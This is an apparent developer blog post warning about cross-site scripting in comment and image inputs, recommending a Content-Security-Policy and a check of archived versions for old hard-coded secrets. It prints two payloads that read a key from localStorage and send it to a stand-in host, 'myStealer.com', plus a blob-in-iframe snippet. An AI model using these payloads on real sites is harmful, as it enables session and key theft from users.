Ways hack a Website #1

nokol profile image Nokol ・2 min read

Ok I write this to prevent for you to do this kind of mistakes.

lets begin.

You host a blog or a commentary function o.e?
Watch for possible user inputs otherwise attackers could to things like this in their text

javascript:(function(){var a=JSON.parse(localStorage.getItem('key'));window.location.href='http://myStealer.com/?k='+a.userData.appPrivateKey+','+location.origin;})();

or if you allow picture inputs in HTML e.g they could write easily

img src=\\\"test.gif\\\" onerror=\\\"var a=JSON.parse(localStorage.getItem('key'));this.src='http://myStealer.com/?k='+a.PrivateKey+','+location.origin;this.onerror=null\\\">

The session key will instantly be stealed from by opening the Website.

avoid simple blobs and use urls to avoid hacks like this

var svg = '< ?xml version="1.0" encoding="utf-8"?>console.log(localStorage)';
var blob = new Blob([svg],{type:"image/svg+xml"});
document.getElementsByTagName('iframe')[0].src = URL.createObjectURL(blob);

Prevention technique:

 meta http-equiv="Content-Security-Policy" content="script-src 'self'">

Note that if content delivery networks (CDNs) are used, those will have to be whitelisted as well.

CHANGE old static passwords or old API holes.

Out of the developer consoles in browsers we can easily read API endpoints, the biggest mistake is that minified files cannot be formatted into a readable format. Apps builded with React, Angular, Vue are easy to read.

A common hack technique is to use the wayback machine (https://archive.org/web/) to find old lacks and hard coded stuff.

Look what was old hard coded, maybe some passwords or API

Thats it for now

Posted on May 25 by:


markdown guide